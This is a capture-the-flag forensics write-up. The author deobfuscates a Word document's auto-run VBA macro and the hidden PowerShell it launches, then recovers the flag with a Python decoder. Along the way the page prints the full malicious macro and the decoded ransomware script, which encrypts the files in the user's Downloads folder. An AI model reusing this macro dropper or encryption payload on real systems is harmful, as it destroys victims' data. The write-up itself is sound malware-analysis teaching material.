badRansomware (325) - Forensics

 

 

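We are given a file in Microsoft Word format. It was the very first of the forensics challenges, but I was poorly prepared: installing Microsoft Word took time, I had not activated it so I uninstalled it again, and while looking for a free office suite I found LibreOffice and installed that instead. I ended up spending almost all of my time on this, which made it a rather deflating challenge. Still, wanting to solve at least one challenge, I calmly finished the installation and opened the file.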

 

 

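Opening the challenge file shows two images like the ones above, placed one above the other. The first time it is opened, the antivirus reports that it detected a macro and removes the macro from the file.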

 

 

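So I temporarily turned off the antivirus's real-time protection and opened the file again; this time the office program warned that it had temporarily blocked the macro. I lifted that block as well and went into the macro editor.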

 

 

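That shows the code above. It is written in the VBA scripting language, and at a glance you can see that it is obfuscated. So, for readability, I started by analysing the code in order to deobfuscate it. The very first thing I did was remove the meaningless Sleep 0 statements.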

 

Rem Attribute VBA_ModuleType=VBAModule
Option VBASupport 1
Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim lqijdaihdm, ozmuxxvcfj
lqijdaihdm = 219
ozmuxxvcfj = 11 / Tan(lqijdaihdm)
Dim nxvrbjohlp
Dim bhofyfqsep, qfqgcgzjyw
bhofyfqsep = 213
qfqgcgzjyw = 2 / Tan(bhofyfqsep)
nxvrbjohlp = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
Dim flodmtaypj, jvlnaehckw
flodmtaypj = 216
jvlnaehckw = 16 / Tan(flodmtaypj)
nxvrbjohlp = ActiveDocument.Shapes("adaopiwer").AlternativeText & nxvrbjohlp
Dim cfojvvygsc, kusmewpqle
cfojvvygsc = 142
kusmewpqle = 7 / Tan(cfojvvygsc)
Dim hxeayqcjkw
Dim mpjdkfcpwy, pwskaanarc
mpjdkfcpwy = 176
pwskaanarc = 3 / Tan(mpjdkfcpwy)
hxeayqcjkw = "@@@"
Dim sakzfltqsd, tmjquuqxcn
sakzfltqsd = 114
tmjquuqxcn = 13 / Tan(sakzfltqsd)
nxvrbjohlp = Split(nxvrbjohlp, hxeayqcjkw)
Dim xdbhkftuxy, xfmydgoyhg
xdbhkftuxy = 244
xfmydgoyhg = 7 / Tan(xdbhkftuxy)
Dim gvkbqsplby
Dim fvhgsaanbr, mlxrgwziup
fvhgsaanbr = 164
mlxrgwziup = 20 / Tan(fvhgsaanbr)
gvkbqsplby = 0
Dim rwruwadwii, zlhnhmondv
rwruwadwii = 261
zlhnhmondv = 9 / Tan(rwruwadwii)
Dim qtlapbphgi
Dim yjxjcijsmy, cnvhrfgahf
yjxjcijsmy = 142
cnvhrfgahf = 6 / Tan(yjxjcijsmy)
qtlapbphgi = UBound(nxvrbjohlp) - 1
Dim vcagzoujxg, tmxbnkwhov
vcagzoujxg = 299
tmxbnkwhov = 20 / Tan(vcagzoujxg)
Dim zxzflmeecx
For E = gvkbqsplby To qtlapbphgi
Dim qyexnwafyb, hhxzrzkunq
qyexnwafyb = 209
hhxzrzkunq = 12 / Tan(qyexnwafyb)
Dim otfyqjyayp
Dim uagvycagqv, sqqsddtdeo
uagvycagqv = 193
sqqsddtdeo = 6 / Tan(uagvycagqv)
Dim jqdtyohplz
Dim kfjpmnjmnk, trgorcjrzg
kfjpmnjmnk = 121
trgorcjrzg = 8 / Tan(kfjpmnjmnk)
otfyqjyayp = nxvrbjohlp(E)
Dim izzwsqycpd, sgptfleqdc
izzwsqycpd = 144
sgptfleqdc = 14 / Tan(izzwsqycpd)
jqdtyohplz = ChrW(otfyqjyayp)
Dim iehqtgzbix, dimapxqodt
iehqtgzbix = 281
dimapxqodt = 11 / Tan(iehqtgzbix)
zxzflmeecx = zxzflmeecx & jqdtyohplz
Dim zgtmroijyp, qgohafconv
zgtmroijyp = 127
qgohafconv = 19 / Tan(zgtmroijyp)
Next
Dim uhykmvhjep, sbplkxtzdh
uhykmvhjep = 164
sbplkxtzdh = 20 / Tan(uhykmvhjep)
zxzflmeecx = "ell -e IAB" & zxzflmeecx
Dim nmcjkawjha, ssykbvliaz
nmcjkawjha = 124
ssykbvliaz = 16 / Tan(nmcjkawjha)
zxzflmeecx = "wersh" & zxzflmeecx
Dim bxjbolkxwx, zkvbaocdar
bxjbolkxwx = 140
zkvbaocdar = 7 / Tan(bxjbolkxwx)
zxzflmeecx = "po" & zxzflmeecx
Dim hywymasgnh, axfgmhjfgt
hywymasgnh = 168
axfgmhjfgt = 13 / Tan(hywymasgnh)
Call Shell(zxzflmeecx, 0)
Dim zrekfillik, gxwbfbnogb
zrekfillik = 181
gxwbfbnogb = 14 / Tan(zrekfillik)
Dim rflodrfqdx, rtkvsswpoh
rflodrfqdx = 123
rtkvsswpoh = 15 / Tan(rflodrfqdx)
End Sub

 

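Second, I removed code like the following, which declares variables, assigns a value to one of them, and then performs a meaningless calculation that has no effect on anything afterwards. (Regex: Dim \w{10}, \w*\n\w{10} = \d{3}\n\w{10} = .*)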

 

Dim lqijdaihdm, ozmuxxvcfj
lqijdaihdm = 219
ozmuxxvcfj = 11 / Tan(lqijdaihdm)

 

The result is the code below.

 

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim nxvrbjohlp
nxvrbjohlp = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
nxvrbjohlp = ActiveDocument.Shapes("adaopiwer").AlternativeText & nxvrbjohlp
Dim hxeayqcjkw
hxeayqcjkw = "@@@"
nxvrbjohlp = Split(nxvrbjohlp, hxeayqcjkw)
Dim gvkbqsplby
gvkbqsplby = 0
Dim qtlapbphgi
qtlapbphgi = UBound(nxvrbjohlp) - 1
Dim zxzflmeecx
For E = gvkbqsplby To qtlapbphgi
Dim otfyqjyayp
Dim jqdtyohplz
otfyqjyayp = nxvrbjohlp(E)
jqdtyohplz = ChrW(otfyqjyayp)
zxzflmeecx = zxzflmeecx & jqdtyohplz
Next
zxzflmeecx = "ell -e IAB" & zxzflmeecx
zxzflmeecx = "wersh" & zxzflmeecx
zxzflmeecx = "po" & zxzflmeecx
Call Shell(zxzflmeecx, 0)
End Sub

 

Then I gave the variables in the code above more meaningful names and replaced variables that were used needlessly and repeatedly with constants, turning it into clearer code.

 

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim image_str
image_str = ActiveDocument.Shapes("pelxcitrdd").AlternativeText
image_str = ActiveDocument.Shapes("adaopiwer").AlternativeText & image_str
image_str = Split(image_str, "@@@")
Dim command_str
For E = 0 To UBound(image_str) - 1
Dim splitted_str
Dim char_str
splitted_str = image_str(E)
char_str = ChrW(splitted_str)
command_str = command_str & char_str
Next
command_str = "powershell -e IAB" & command_str
Call Shell(command_str, 0)
End Sub

 

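Finally, I looked up ActiveDocument.Shapes("").AlternativeText in the Microsoft Word VBA documentation, which said that it is the alternative text of a shape. That text can be found as shown below: right-click the image, open its properties, and on the Options tab you can see the shape's name and description.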

 

 

Substituting that into the code gives the following. The strings are too long, so I have truncated them.

 

Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)
Sub AutoOpen()
Dim image_str
image_str = "4@@@81@@@65@@@120@@@65@@@68...(omitted)"
image_str = "74@@@65@@@69@@@85@@@65@@@87...(omitted)" & image_str
image_str = Split(image_str, "@@@")
Dim command_str
For E = 0 To UBound(image_str) - 1
Dim splitted_str
Dim char_str
splitted_str = image_str(E)
char_str = ChrW(splitted_str)
command_str = command_str & char_str
Next
command_str = "powershell -e IAB" & command_str
Call Shell(command_str, 0)
End Sub

 

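After this transformation the code is much clearer, and you can see that at the very bottom it calls the Shell function to run a powershell command. Running that command would set off the ransomware, so to look at just the finished command string I wrote the code in Python, which I am more familiar with, and printed the command string.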

 

image_str = "4@@@81@@@65@@@120@@@65@@@68@@@69@@@65@@@77@@@81...(omitted)"
image_str = "74@@@65@@@69@@@85@@@65@@@87@@@65@@@65@@@111@@@65...(omitted)" + image_str
image_str = image_str.split("@@@")
command_str = ""
# The macro loops "For E = 0 To UBound(image_str) - 1", so it never uses the last element
for E in image_str[:-1]:
    char_str = chr(int(E))
    command_str = command_str + char_str
command_str = "powershell -e IAB" + command_str
print(command_str)

 

The output is as follows.

 


 

From this, I extracted only the Base64-encoded part and decoded it.

 

 IEX( -joiN('36w97%32p61}32X34I36c72c79%77}69w92%92I100M111U119X110U108w111U97M100X115}34w13}10p13}10X91X82c101}102w108w101R99I116I105U111M110M46M65R115w115w101U109M98I108U121U93}58w58p40p39w76%111U39%43U39I97}100%70U105c39w43w39c108I101M39}41c46c73I110c118p111}107U101w40M40}40U40U34w123w48X125U123w49p53c125U123R49X50%125U123U49w48%125w123I51w125X123I49M52}125c123c49U54U125}123M57w125p123U52p125p123I50U125M123%49}49M125}123%49X51%125w123c54}125c123M53}125M123w56I125R123w49U55p125c123c49I125M123c55U125M34X45w102U32p39R67R58I107%98w51w87p73X39%44}39p98I39p44%39%119R111c114w39%44%39R102}116M39w44w39p98M51M70p114}97}109X101U39w44}39M83R121I115%116c101%39I44%39c98U51X39c44I39I46p100c108p108U39R44I39M109R39w44c39R84X107w39U44c39I98U51w77w105c99I114U111I115}111}39p44c39M107X107}39p44c39M83U107}39I44w39I98w51U118%50p46}48M46M53%48X55U50U55%107U39U44X39p46R39%44p39}78U68w79U87}39}44I39p78p69p39w44X39M46}87R101X39w41w41U46c34X82}69U112I96%76X97p99I101%34X40U40I91I67R72R97I82R93p49p48c55}43R91X67X72R97w82w93%57p56R43}91M67w72w97R82p93I53p49%41%44M91}115I116%114U105X78w103p93w91%67I72R97I82M93c57U50X41I41I41I32X124X32w38R40c34R123X48}125}123%49c125X34p32}45c102p32U39I111c117X116p45%39M44w39c110%117U108X108I39M41}13c10M13M10w13w10}46M40%34U123X50R125R123c49U125}123}48X125%34U32R45R102w39U45U67M104%105I108p100I73M116R101R109w39I44c39%101M116I39c44%39}71}39I41M32%45%80R97U116M104p32I36I97%32p124c32%38}40}34w123U50c125X123%48X125w123M49U125c34}45R102}39}99U104I45U79U98M39p44}39I106U101c99p116%39X44}39}70M111U114w101c97w39}41X32p123I13X10M9%36%101c114p116R32w61p32p36U95%46p34X70w85c96I76%76w110c65X77I69%34R32M43U32w40w34w123}48}125M123X49w125R123w50X125}34p45R102c32p39M46%101R39I44}39p110R39%44w39M99}101U100p39I41R13U10%9U36c115%116c117I102w102X32p61U32U38X40U34%123M49I125c123I50R125X123%48I125X34}45U102w39U116R39R44U39M71X101%116M45X67X111M110I39U44U39}116M101w110R39%41R32U36%95p46I34M102c117}96w76I108R110M97c77U101M34X13I10}9}13M10p9p36U100w114M116%32}61w32I91}83c121%115U116p101}1
09M46p67w111p110U118M101M114X116M93I58X58X40}39}70}39X43w39X114w111c109%66c97X115%101M39c43I39}54X39%43U39}52w83w116%114}105I110M39I43w39c103M39M41X46I73c110U118p111I107}101X40U40%34%123%48I125%123I51%125R123%50}125U123R49R125X123R53I125p123p52I125R34U45X102X32w39R83U70M39R44}39p48c98}110w77U119M98p84X78}51%97%68R78p83X39p44w39p73w39I44M39M82}67M101U51w39I44w39w81c61M61}39%44}39%102U39}41w41M13w10}9%36w114R32R61M32p38R40}34X123M50X125R123M49c125p123X48I125I123c51w125I34w32U45X102%32w39w98w39U44U39U79I39X44X39%110p101M119}45c39R44%39R106X101p99U116c39p41I32U40p34p123p49p48%125R123R53R125c123c49U125U123U48R125M123c57X125X123p51R125I123}54M125M123c55R125}123R50U125}123c52p125X123w56}125}34w45M102U39p101c99%117X114X105p116w39w44w39U46U83}39U44I39}100c97R101M39}44c39I103w114U39R44I39p108M77I97I110c39I44R39U121%115%116I101w109X39M44%39M97p112}104}121}46M82w105R106R39w44%39X110%39R44U39c97U103}101w100R39M44c39}121R46%67w114c121U112}116I111}39U44R39%83U39w41X32R13U10w9c36I99p32}61I32X36c114I46I40w39}67p114p101R39I43c39X97}116w101c69p110I39I43R39U99}114M121%39%43w39I112U116c111p39%43M39M114X39c41%46p73U110}118}111I107X101U40R36X100%114R116R44%32U40c49p46R46c49M54U41p41c13M10R9U36w109I115M32}61R32X38U40M34c123p50p125R123%49I125%123%48%125U34I45X102M32M39p99U116p39X44c39w98I106c101}39w44%39c110I101U119w45I79c39U41R32R40X34R123M51w125p123R49}125%123%48c125I123c50w125}34c45U102c32R39R116R39c44U39p79I46R77%101U109I111w114%121M83I39U44M39U114I101p97}109p39U44M39M73R39w41I13c10p9p36I99}115U32p61p32}38M40U34X123R48X125X123}49I125}123}50X125c34X32R45c102c39U110}39%44w39X101U119R45M39}44I39c79M98U106X101M99p116%39}41X32R40I34c123}50c125M123p52c125U123p53U125I123I48}125U123}55X125R123U49c125w123U57M125M123X51I125p123%56I125p123I54X125}34}32}45I102c39}67M114I121w39}44p39M103I39w44w39w83X39%44c39I67w114I121w112X116M39X44w39X101M99w117I114}105I39c44I39R116%121%46p39w44X39U97%109%39}44p39%112}116%111w39w44I39}111w83I116%114R101R39X44M39%114M97p112X104X121I46U39M41%32I36R109M115w44U36c99X44
c40c34R123X48c125U123M49M125M34p45X102c39p87I39X44c39p114w105X116w101I39U41}13U10X9U36M115M119w32X61%32I38%40}34%123U49I125M123}50X125M123c48p125R34w45M102X32}39M116M39c44R39w110I101R119%39w44w39X45U79}98R106U101p99%39U41X32p40R34w123w48%125c123c50I125c123R52I125p123I49p125X123I51c125}34I32p45p102c32c39I73I79p39I44}39c97p109R39U44X39I46}83p116%114M39p44M39I87R114w105U116p101I114I39p44p39w101M39}41%32X36}99w115w13c10c9w36c115R119c46R40R39}87w114c105%116U39c43c39c101}39c41}46U73w110R118U111}107w101p40M36p115%116w117X102X102I41U13p10w9w36M115}119X46M40R39I67p39I43U39%108X111X115U101I39}41%46M73I110}118p111M107c101w40X41}13%10X9X36%99}115X46R40%39w67X39}43U39X108c111R115X101M39p41%46}73M110p118R111%107c101%40U41}13c10I9}36U109U115R46p40c39U67X108%111R115I39M43w39M101}39w41R46%73U110c118X111p107%101U40p41w13M10I9R36p114M46I40U39w67X108}101M97w39U43%39X114%39}41%46%73I110}118I111R107U101w40X41I13p10w9I91I98w121I116c101U91U93%93p36M117w116}115M32p61I32I36%109I115X46I40X39R84X111}65}114}39w43M39w114M97}121R39R41w46X73p110%118}111M107p101p40p41c13w10X9I91w105c111}46M102p105M108M101}93M58p58I40%39%87I39R43U39M114M105R116}101%39U43p39w65}108X39%43p39%108}39}43}39p66p121R116p101U115I39R41w46I73X110%118c111I107R101M40w36R101X114p116w44I36X117%116}115R41U13R10c125'.splIt('XwcIMp}UR%')| %{ ([cHar] [INT] $_)} ))

 

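Honestly, while I was solving the challenge I had no idea what this code was. Time was passing, I had not solved a single challenge, and I was in a hurry, so I simply assumed that programming languages are all more or less alike and worked it out by my own interpretation.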

 

.splIt('XwcIMp}UR%')| %{ ([cHar] [INT] $_)} ))

 

I interpreted the code above as follows.

 

Remove every character in the preceding string that is one of X, w, c, I, M, p, }, U, R, %, and convert all of the resulting int (integer) values to char (character).

 

The numbers in the code below were produced entirely by regex substitution.

 

regex101.com

 

Then I put those numbers into an array, as in the code below, and converted them to characters with chr.

 

numbers = [36,97,32,61,32,34,36,72,79,77,69,92,92,100,111,119,110,108,111,97,100,115,34,13,10,13,10,91,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,40,39,76,111,39,43,39,97,100,70,105,39,43,39,108,101,39,41,46,73,110,118,111,107,101,40,40,40,40,34,123,48,125,123,49,53,125,123,49,50,125,123,49,48,125,123,51,125,123,49,52,125,123,49,54,125,123,57,125,123,52,125,123,50,125,123,49,49,125,123,49,51,125,123,54,125,123,53,125,123,56,125,123,49,55,125,123,49,125,123,55,125,34,45,102,32,39,67,58,107,98,51,87,73,39,44,39,98,39,44,39,119,111,114,39,44,39,102,116,39,44,39,98,51,70,114,97,109,101,39,44,39,83,121,115,116,101,39,44,39,98,51,39,44,39,46,100,108,108,39,44,39,109,39,44,39,84,107,39,44,39,98,51,77,105,99,114,111,115,111,39,44,39,107,107,39,44,39,83,107,39,44,39,98,51,118,50,46,48,46,53,48,55,50,55,107,39,44,39,46,39,44,39,78,68,79,87,39,44,39,78,69,39,44,39,46,87,101,39,41,41,46,34,82,69,112,96,76,97,99,101,34,40,40,91,67,72,97,82,93,49,48,55,43,91,67,72,97,82,93,57,56,43,91,67,72,97,82,93,53,49,41,44,91,115,116,114,105,78,103,93,91,67,72,97,82,93,57,50,41,41,41,32,124,32,38,40,34,123,48,125,123,49,125,34,32,45,102,32,39,111,117,116,45,39,44,39,110,117,108,108,39,41,13,10,13,10,13,10,46,40,34,123,50,125,123,49,125,123,48,125,34,32,45,102,39,45,67,104,105,108,100,73,116,101,109,39,44,39,101,116,39,44,39,71,39,41,32,45,80,97,116,104,32,36,97,32,124,32,38,40,34,123,50,125,123,48,125,123,49,125,34,45,102,39,99,104,45,79,98,39,44,39,106,101,99,116,39,44,39,70,111,114,101,97,39,41,32,123,13,10,9,36,101,114,116,32,61,32,36,95,46,34,70,85,96,76,76,110,65,77,69,34,32,43,32,40,34,123,48,125,123,49,125,123,50,125,34,45,102,32,39,46,101,39,44,39,110,39,44,39,99,101,100,39,41,13,10,9,36,115,116,117,102,102,32,61,32,38,40,34,123,49,125,123,50,125,123,48,125,34,45,102,39,116,39,44,39,71,101,116,45,67,111,110,39,44,39,116,101,110,39,41,32,36,95,46,34,102,117,96,76,108,110,97,77,101,34,13,10,9,13,10,9,36,100,114,116,32,61,32,91,83,121,115,116,101,109
,46,67,111,110,118,101,114,116,93,58,58,40,39,70,39,43,39,114,111,109,66,97,115,101,39,43,39,54,39,43,39,52,83,116,114,105,110,39,43,39,103,39,41,46,73,110,118,111,107,101,40,40,34,123,48,125,123,51,125,123,50,125,123,49,125,123,53,125,123,52,125,34,45,102,32,39,83,70,39,44,39,48,98,110,77,119,98,84,78,51,97,68,78,83,39,44,39,73,39,44,39,82,67,101,51,39,44,39,81,61,61,39,44,39,102,39,41,41,13,10,9,36,114,32,61,32,38,40,34,123,50,125,123,49,125,123,48,125,123,51,125,34,32,45,102,32,39,98,39,44,39,79,39,44,39,110,101,119,45,39,44,39,106,101,99,116,39,41,32,40,34,123,49,48,125,123,53,125,123,49,125,123,48,125,123,57,125,123,51,125,123,54,125,123,55,125,123,50,125,123,52,125,123,56,125,34,45,102,39,101,99,117,114,105,116,39,44,39,46,83,39,44,39,100,97,101,39,44,39,103,114,39,44,39,108,77,97,110,39,44,39,121,115,116,101,109,39,44,39,97,112,104,121,46,82,105,106,39,44,39,110,39,44,39,97,103,101,100,39,44,39,121,46,67,114,121,112,116,111,39,44,39,83,39,41,32,13,10,9,36,99,32,61,32,36,114,46,40,39,67,114,101,39,43,39,97,116,101,69,110,39,43,39,99,114,121,39,43,39,112,116,111,39,43,39,114,39,41,46,73,110,118,111,107,101,40,36,100,114,116,44,32,40,49,46,46,49,54,41,41,13,10,9,36,109,115,32,61,32,38,40,34,123,50,125,123,49,125,123,48,125,34,45,102,32,39,99,116,39,44,39,98,106,101,39,44,39,110,101,119,45,79,39,41,32,40,34,123,51,125,123,49,125,123,48,125,123,50,125,34,45,102,32,39,116,39,44,39,79,46,77,101,109,111,114,121,83,39,44,39,114,101,97,109,39,44,39,73,39,41,13,10,9,36,99,115,32,61,32,38,40,34,123,48,125,123,49,125,123,50,125,34,32,45,102,39,110,39,44,39,101,119,45,39,44,39,79,98,106,101,99,116,39,41,32,40,34,123,50,125,123,52,125,123,53,125,123,48,125,123,55,125,123,49,125,123,57,125,123,51,125,123,56,125,123,54,125,34,32,45,102,39,67,114,121,39,44,39,103,39,44,39,83,39,44,39,67,114,121,112,116,39,44,39,101,99,117,114,105,39,44,39,116,121,46,39,44,39,97,109,39,44,39,112,116,111,39,44,39,111,83,116,114,101,39,44,39,114,97,112,104,121,46,39,41,32,36,109,115,44,36,99,44,4
0,34,123,48,125,123,49,125,34,45,102,39,87,39,44,39,114,105,116,101,39,41,13,10,9,36,115,119,32,61,32,38,40,34,123,49,125,123,50,125,123,48,125,34,45,102,32,39,116,39,44,39,110,101,119,39,44,39,45,79,98,106,101,99,39,41,32,40,34,123,48,125,123,50,125,123,52,125,123,49,125,123,51,125,34,32,45,102,32,39,73,79,39,44,39,97,109,39,44,39,46,83,116,114,39,44,39,87,114,105,116,101,114,39,44,39,101,39,41,32,36,99,115,13,10,9,36,115,119,46,40,39,87,114,105,116,39,43,39,101,39,41,46,73,110,118,111,107,101,40,36,115,116,117,102,102,41,13,10,9,36,115,119,46,40,39,67,39,43,39,108,111,115,101,39,41,46,73,110,118,111,107,101,40,41,13,10,9,36,99,115,46,40,39,67,39,43,39,108,111,115,101,39,41,46,73,110,118,111,107,101,40,41,13,10,9,36,109,115,46,40,39,67,108,111,115,39,43,39,101,39,41,46,73,110,118,111,107,101,40,41,13,10,9,36,114,46,40,39,67,108,101,97,39,43,39,114,39,41,46,73,110,118,111,107,101,40,41,13,10,9,91,98,121,116,101,91,93,93,36,117,116,115,32,61,32,36,109,115,46,40,39,84,111,65,114,39,43,39,114,97,121,39,41,46,73,110,118,111,107,101,40,41,13,10,9,91,105,111,46,102,105,108,101,93,58,58,40,39,87,39,43,39,114,105,116,101,39,43,39,65,108,39,43,39,108,39,43,39,66,121,116,101,115,39,41,46,73,110,118,111,107,101,40,36,101,114,116,44,36,117,116,115,41,13,10,125]
for i in numbers:
	print(chr(i), end='')

 

And, whether by luck or not, a result came out on the first try.

 

$a = "$HOME\\downloads"

[Reflection.Assembly]::('Lo'+'adFi'+'le').Invoke(((("{0}{15}{12}{10}{3}{14}{16}{9}{4}{2}{11}{13}{6}{5}{8}{17}{1}{7}"-f 'C:kb3WI','b','wor','ft','b3Frame','Syste','b3','.dll','m','Tk','b3Microso','kk','Sk','b3v2.0.50727k','.','NDOW','NE','.We'))."REp`Lace"(([CHaR]107+[CHaR]98+[CHaR]51),[striNg][CHaR]92))) | &("{0}{1}" -f 'out-','null')


.("{2}{1}{0}" -f'-ChildItem','et','G') -Path $a | &("{2}{0}{1}"-f'ch-Ob','ject','Forea') {
        $ert = $_."FU`LLnAME" + ("{0}{1}{2}"-f '.e','n','ced')
        $stuff = &("{1}{2}{0}"-f't','Get-Con','ten') $_."fu`LlnaMe"

        $drt = [System.Convert]::('F'+'romBase'+'6'+'4Strin'+'g').Invoke(("{0}{3}{2}{1}{5}{4}"-f 'SF','0bnMwbTN3aDNS','I','RCe3','Q==','f'))
        $r = &("{2}{1}{0}{3}" -f 'b','O','new-','ject') ("{10}{5}{1}{0}{9}{3}{6}{7}{2}{4}{8}"-f'ecurit','.S','dae','gr','lMan','ystem','aphy.Rij','n','aged','y.Crypto','S')
        $c = $r.('Cre'+'ateEn'+'cry'+'pto'+'r').Invoke($drt, (1..16))
        $ms = &("{2}{1}{0}"-f 'ct','bje','new-O') ("{3}{1}{0}{2}"-f 't','O.MemoryS','ream','I')
        $cs = &("{0}{1}{2}" -f'n','ew-','Object') ("{2}{4}{5}{0}{7}{1}{9}{3}{8}{6}" -f'Cry','g','S','Crypt','ecuri','ty.','am','pto','oStre','raphy.') $ms,$c,("{0}{1}"-f'W','rite')
        $sw = &("{1}{2}{0}"-f 't','new','-Objec') ("{0}{2}{4}{1}{3}" -f 'IO','am','.Str','Writer','e') $cs
        $sw.('Writ'+'e').Invoke($stuff)
        $sw.('C'+'lose').Invoke()
        $cs.('C'+'lose').Invoke()
        $ms.('Clos'+'e').Invoke()
        $r.('Clea'+'r').Invoke()
        [byte[]]$uts = $ms.('ToAr'+'ray').Invoke()
        [io.file]::('W'+'rite'+'Al'+'l'+'Bytes').Invoke($ert,$uts)
}

 

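Once again we meet obfuscated code. The PowerShell above appears to be ransomware code that encrypts the files in a particular path and creates new files from them (not dangerous at all?). For the purpose of solving the challenge, the thing to print out is, once again, a Base64-encoded string. I will assemble(?) that string in order and Base64-decode it.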

 

SFRCe3I0bnMwbTN3aDNSfQ==
atob("SFRCe3I0bnMwbTN3aDNSfQ=="); // javascript base64 decoding
"HTB{r4ns0m3wh3R}"

 

And that is how the flag came out.
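
The layers peeled by hand in this write-up (the Base64 argument of `powershell -e`, the char-code blob fed to `.splIt(...)`, and the `-f` / string-concatenation obfuscation) can all be undone statically. The Python below is an added example, not part of the original post: `build_sample` wraps two lines copied from the decoded script above into a constructed input with the same layering, and every function name is chosen for this example.

```python
import base64
import re

# Two lines copied verbatim from the decoded PowerShell shown on this page.
PAGE_LINES = "\n".join([
    r"""$drt = [System.Convert]::('F'+'romBase'+'6'+'4Strin'+'g').Invoke(("{0}{3}{2}{1}{5}{4}"-f 'SF','0bnMwbTN3aDNS','I','RCe3','Q==','f'))""",
    r"""$r = &("{2}{1}{0}{3}" -f 'b','O','new-','ject') ("{10}{5}{1}{0}{9}{3}{6}{7}{2}{4}{8}"-f'ecurit','.S','dae','gr','lMan','ystem','aphy.Rij','n','aged','y.Crypto','S')""",
])
DELIMS = "XwcIMp}UR%"  # separator characters passed to .splIt(...) in the sample


def build_sample(script: str) -> str:
    """Constructed input: wrap `script` in the same two layers as the sample."""
    blob = "".join(str(ord(ch)) + DELIMS[i % len(DELIMS)]
                   for i, ch in enumerate(script))[:-1]
    stage = " IEX( -joiN('" + blob + "'.splIt('" + DELIMS + "')| %{ ([cHar] [INT] $_)} ))"
    return base64.b64encode(stage.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(b64: str) -> str:
    """Layer 1: the argument of `powershell -e` is Base64 over UTF-16LE text."""
    b64 = b64.strip()
    b64 += "=" * (-len(b64) % 4)  # tolerate missing padding
    return base64.b64decode(b64).decode("utf-16-le")


SPLIT_CALL = re.compile(r"'([^']*)'\s*\.split\(\s*'([^']*)'\s*\)", re.IGNORECASE)


def decode_charcode_layer(script: str) -> str:
    """Layer 2: '<n><sep><n>...'.Split('<seps>') piped through [char][int].

    Windows PowerShell binds the string argument of .Split() to char[], so
    every character of it is a separator, not one multi-character delimiter.
    """
    m = SPLIT_CALL.search(script)
    if m is None:
        raise ValueError("no '...'.Split('...') char-code blob found")
    blob, seps = m.groups()
    tokens = re.split("[" + re.escape(seps) + "]", blob)
    return "".join(chr(int(t)) for t in tokens if t)


LIT = r"'[^']*'"  # single-quoted literal without embedded quotes
FORMAT_OP = re.compile(r'"((?:\{\d+\})+)"\s*-f\s*(' + LIT + r"(?:\s*,\s*" + LIT + r")*)",
                       re.IGNORECASE)
CONCAT = re.compile(LIT + r"(?:\s*\+\s*" + LIT + r")+")


def _literals(text: str) -> list:
    return re.findall(r"'([^']*)'", text)


def _expand_format(m: re.Match) -> str:
    args = _literals(m.group(2))
    try:
        joined = re.sub(r"\{(\d+)\}", lambda i: args[int(i.group(1))], m.group(1))
    except IndexError:
        return m.group(0)  # index without a matching argument: leave untouched
    return "'" + joined + "'"


def resolve_string_obfuscation(script: str) -> str:
    """Layer 3: fold "{1}{0}" -f 'b','a' and 'a'+'b' into plain literals."""
    previous = None
    while script != previous:  # repeat until nothing more can be folded
        previous = script
        script = FORMAT_OP.sub(_expand_format, script)
        script = CONCAT.sub(lambda m: "'" + "".join(_literals(m.group(0))) + "'", script)
    # A backtick before an uppercase letter has no escape meaning ("FU`LLnAME").
    return re.sub(r"`(?=[A-Z])", "", script)


B64_CALL = re.compile(r"FromBase64String'?\)?(?:\.Invoke)?\(+'([A-Za-z0-9+/=]+)'")


def base64_arguments(script: str) -> list:
    """Decode every literal passed to FromBase64String in readable script."""
    return [base64.b64decode(s) for s in B64_CALL.findall(script)]


def analyse(encoded_command: str):
    """Run all three layers; return the readable script and decoded blobs."""
    stage = decode_charcode_layer(decode_encoded_command(encoded_command))
    readable = resolve_string_obfuscation(stage)
    return readable, base64_arguments(readable)


if __name__ == "__main__":
    readable, blobs = analyse(build_sample(PAGE_LINES))
    print(readable)
    print(blobs)
```

None of these steps executes the PowerShell, so the payload can be read without running it.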

 

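What I thought after solving it was that next time I would like to look into automated VBA analysis tools and do the analysis more safely and efficiently. Since this was my first encounter with a forensics challenge, I feel I solved it in a rather convoluted way.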
